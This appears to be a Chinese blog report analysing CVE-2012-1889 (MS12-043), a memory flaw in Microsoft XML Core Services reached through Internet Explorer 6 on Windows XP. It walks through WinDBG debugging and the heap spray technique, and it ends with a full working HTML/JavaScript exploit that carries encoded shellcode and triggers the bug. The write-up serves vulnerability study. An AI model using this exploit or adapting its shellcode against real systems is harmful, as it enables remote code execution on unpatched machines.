MS12-043(CVE-2012-1889)漏洞分析报告

MS12-043(CVE-2012-1889)漏洞分析报告

 

软件名称:Internet Explorer

软件版本:6.0.2900

漏洞模块:iexplore.exe

模块版本:6.0.2900

编译日期:2012-06-18

操作系统:Windows XP SP3(5.1.2600)

漏洞编号:CVE-2012-1889

危害等级:高

漏洞类型:缓冲区溢出

威胁类型:远程

 

 

 

 

分析人:李祥

2017年3月2日

 

1. 漏洞简介

MS12-043(CVE-2012-1889)是一个被360捕获的系统级漏洞,这个漏洞的影响范围之广可谓前无古人,多家主流媒体予以报道,以下就是受这个漏洞影响的系统:


Windows XP SP3(x86)

Windows XP SP2(x64)

Windows Server 2003 SP2(x86/x64)

Windows Vista SP2(x86/x64)

Windows Server 2008 SP2(x86/x64)

Windows 7(x86/x64)

Windows 7 SP1(x86/x64)

Windows Server 2008 R2(x86/x64)

Windows Server 2008 R2 SP1(x86/x64)

Windows 8(x86/x64)

 


2. 漏洞成因

Microsoft XML Core Services(MSXML)是一组服务,可用JScript、VBScript、Microsoft开发工具编写的应用构建基于XML的Windows-native应用。

Microsoft XML Core Services 3.0、4.0、5.0和6.0版本中存在漏洞,该漏洞源于访问未初始化内存位置。远程攻击者可利用该漏洞借助特制的web站点,执行任意代码或导致拒绝服务。

 

3. 实验环境

为了更好的对漏洞进行分析,排除其他干扰因素,我们需要搭建一个虚拟机实验环境

操作系统:Windows XP SP3(5.1.2600)

浏览器:Internet Explorer 6.0.2900

调试器:WinDBG 6.0

虚拟机:VMware Workstation 12 Pro

 

以上只对操作系统及浏览器有强制性版本要求,其他工具在与操作系统适配的前提下版本越高越好


4. 分析POC

根据网上的可查信息,我们可以得到触发此漏洞的漏洞证明(Proof of Concept, POC)


通过搜索,我们可知“f6D90f11-9c73-11d3-b32e-00C04f990bb4”为MSXML 3.0中CLSID_DOMDocument的GUID


我们将此段代码保存为htm文件,双击运行,点击“允许阻止的内容”,引发非法访问,很快浏览器奔溃


点不发送关闭掉浏览器


好的,再次双击htm文件,运行浏览器,这时先不要点“允许阻止的内容”

打开WinDBG,用WinDBG【F6】快捷键附加到IE6,这时浏览器卡住,回到WinDBG按【F5】运行,这时回到IE6点击“允许阻止的内容”,然后WinDBG就会自动断下来


可以看到在执行到call dword ptr [ecx+18h]的时候,触发了漏洞

那么ecx的值是从哪来的呢?往上看,mov ecx , dword ptr [eax]这条指令把eax所指向的内存处的值赋值给了ecx;

再往上看,mov eax , dword ptr [ebp-14h]这条指令,把ebp-14h所指向的内存处的值赋值给了eax,该语句的下一条cmp eax , ebx是对eax和ebx寄存器的比较,而下方正好有一个跳转,如果eax的值等于0就会跳转,越过触发异常的代码,很可惜这个跳转并不会被触发,原因是我们的poc代码在栈上产生了大量的0c0c字节,ebp-14h所指向的内存正好是栈空间,由此eax不为0,于是跳转不会执行。


因为漏洞发生点在堆上,所以我们考虑使用Heap Spray(堆喷射)


Heap Spray技术介绍

Heap Spray(堆喷射)攻击起源于黑客们的恶作剧,起初黑客们经常会使用JavaScript申请大量内存消耗大量资源以使被攻击主机瘫痪,后来在2001年的MS01-033中黑客们第一次使用了此技术,并由Skylined在IE的IFrame漏洞(MS04-040)中使用到这种技术,并正式提出。

之后经过不断发展,Heap spray逐渐成为网页挂马的常用技术,并且也被利用到文档攻击中(例如PDF阅读器)。

攻击者在使用Heap spray的时候,会在堆栈溢出后将EIP指向堆区类似于0x0C0C0C0C的位置,并且在这之前会利用Javascript申请大量的堆内存,并用包含SlideCode和Shellcode的代码块不断重复地占用所申请的内存空间。


如下是堆的分布


Slide内存一般是由200个左右的Slide块组成的,每个Slide块都是由大量的滑板指令(NOP或OR AL,0C)加Shellcode组成的

我们只要申请200块1MB大小的划板数据区,每一块划板数据均由 划板数据+Shellcode 组成,这样其中必定有一块覆盖了0x0C0C0C0C

这样只要0x0C0C0C0C命中任意一个滑板指令,一堆无用的“OR AL,0C”就会将其引导到我们的Shellcode中

为什么0x0C0C0C0C处的内容会被执行?回想我们漏洞触发的原因,当执行到call dword ptr [ecx+18h]时,触发了漏洞。

当执行“call dword ptr [ecx+18h]”的时候,将0x0C0C0C24处的内容0x0C0C0C0C取出当函数地址执行,而此时0x0C0C0C0C正好为我们Slide的头部,当头部执行后,会将执行流程引导到Shellcode


可以利用下面这样的JavaScript代码产生的内存片来覆盖内存

    // 制作一块划板数据
        // 1. 计算填充划板指令数据的大小(都除2是因为length返回的是Unicode的字符个数)
        var nSlideSize      = 1024*1024 / 2;     // 一个划板指令区的大小(1MB)
        var nMlcHadSize     = 32        / 2;     // 堆头部大小
        var nStrLenSize     = 4         / 2;     // 堆长度信息大小
        var nTerminatorSize = 2         / 2;     // 堆结尾符号大小
        var nScSize         = cShellcode.length; // Shellcode大小
        var nFillSize       = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;
        // 2. 填充划板指令,制作好一块填充数据
        var cFillData  = unescape("\u0C0C\u0C0C"); // 划板指令 0C0C   OR AL,0C
        var cSlideData = new Array();              // 申请一个数组对象用于保存划板数据
        while (cFillData.length <= nSlideSize)
            cFillData += cFillData;
        cFillData = cFillData.substring(0, nFillSize);
        // 3. 填充200MB的内存区域(申请200块1MB大小的划板数据区),试图覆盖0x0C0C0C0C
        //   区域,每块划板数据均由 划板数据+Shellcode 组成,这样只要任意一块划板数据
        //   正好落在0x0C0C0C0C处,大量无用的“OR AL,0C”就会将执行流程引到划板数据区
        //   后面的Shellcode处,进而执行Shellcode。
        for (var i = 0; i < 200; i++)
            cSlideData[i] = cFillData + cShellcode;


需要注意的一点是,在JavaScript中以转义形式存储的字符串以Unicode形式存储,length属性返回字符串的Unicode字符个数,所以进行了除以2的操作;此外,JavaScript中每一个内存都存在一些额外的管理信息,所以在填充内存块时需要减去这些信息的长度,具体信息如图所示:

名称

大小

说明

malloc header

32 Bytes

堆块信息

String length

4 Bytes

表示字符串长度

terminator

2 Bytes

字符串结束符,两个字节的NULL



5. 编写Exploit

<html>
<head>
    <title>CVE 2012-1889 PoC v3 By:15PB.Com</title>
</head>
<body>
    <object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
    <script>
        // 1.  准备好Shellcode(unescape()是解码函数)
        var cShellcode = unescape(
        "\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
        "\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
        "\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
        "\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
        "\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
        "\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
        "\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
        "\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
        "\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
        "\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
        "\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
        "\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
        "\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
        "\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
        "\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
        "\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
        "\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
        "\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
        "\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
        "\uC25D\u0010\u0000");
        // 2.  制作一块划板数据
        // 2.1 计算填充划板指令数据的大小(都除2是因为length返回的是Unicode的字符个数)
        var nSlideSize      = 1024*1024 / 2;     // 一个划板指令区的大小(1MB)
        var nMlcHadSize     = 32        / 2;     // 堆头部大小
        var nStrLenSize     = 4         / 2;     // 堆长度信息大小
        var nTerminatorSize = 2         / 2;     // 堆结尾符号大小
        var nScSize         = cShellcode.length; // Shellcode大小
        var nFillSize       = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;
        // 2.2 填充划板指令,制作好一块填充数据
        var cFillData  = unescape("\u0C0C\u0C0C"); // 划板指令 0C0C   OR AL,0C
        var cSlideData = new Array();              // 申请一个数组对象用于保存划板数据
        while (cFillData.length <= nSlideSize)
            cFillData += cFillData;
        cFillData = cFillData.substring(0, nFillSize);
        // 3.  填充200MB的内存区域(申请200块1MB大小的划板数据区),试图覆盖0x0C0C0C0C
        //     区域,每块划板数据均由 划板数据+Shellcode 组成,这样只要任意一块划板数据
        //     正好落在0x0C0C0C0C处,大量无用的“OR AL,0C”就会将执行流程引到划板数据区
        //     后面的Shellcode处,进而执行Shellcode。
        for (var i = 0; i < 200; i++)
            cSlideData[i] = cFillData + cShellcode;
        // 4.  触发CVE 2012-1889漏洞
        // 4.1 获取名为15PB的XML对象,并将其保存到名为obj15PB实例中
        var obj15PB = document.getElementById('15PB').object;
        // 4.2 构建一个长度为0x1000-10=8182,起始内容为“\\15PB_Com”字节的数据
        var srcImgPath = unescape("\u0C0C\u0C0C");
        while (srcImgPath.length < 0x1000)
            srcImgPath += srcImgPath;
        srcImgPath = "\\\\15PB_Com" + srcImgPath;
        srcImgPath = srcImgPath.substr(0, 0x1000-10);
        // 4.3 创建一个图片元素,并将图片源路径设为srcImgPath,并返回当前图片文件名
        var emtPic = document.createElement("img");
        emtPic.src = srcImgPath;
        emtPic.nameProp;
        // 4.4 定义对象obj15PB(触发溢出)
        obj15PB.definition(0);
    </script>
</body>
</html>


我们将此段代码保存为htm文件,双击运行,点击“允许阻止的内容”


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值